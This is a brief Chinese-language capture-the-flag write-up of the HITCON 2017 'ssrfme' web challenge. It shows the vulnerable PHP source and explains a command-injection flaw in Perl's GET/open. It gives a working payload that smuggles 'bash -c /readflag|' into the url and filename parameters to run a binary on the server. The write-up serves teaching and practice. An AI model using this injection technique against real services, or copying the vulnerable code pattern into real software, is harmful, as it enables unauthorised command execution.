HITCON2017-web ssrfme

 <?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

前面的代码返回了我的ip，和orange一起进行md5加密。通过url参数输入的内容会以GET命令执行，

命令执行的结果会被存入我们以filename参数的值命名的文件里

尝试读取根目录，并创建文件名为12的文件

 

用curl查看文件，发现flag文件和readflag。flag是不能直接查看的，需要执行readflag查看flag

 

 

 知识点：perl脚本GET open命令漏洞

GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理

open存在命令执行，并且还支持file函数

 

 

构造payload：?url=file:bash -c /readflag|&filename=bash -c /readflag|

?url=file:bash -c /readflag|&filename=123

因为我们传入的是文件名，如果文件不存在是无法被执行的，所以我们用filename创建同名的文件，

之后再任意创建一个文件名，访问就可以了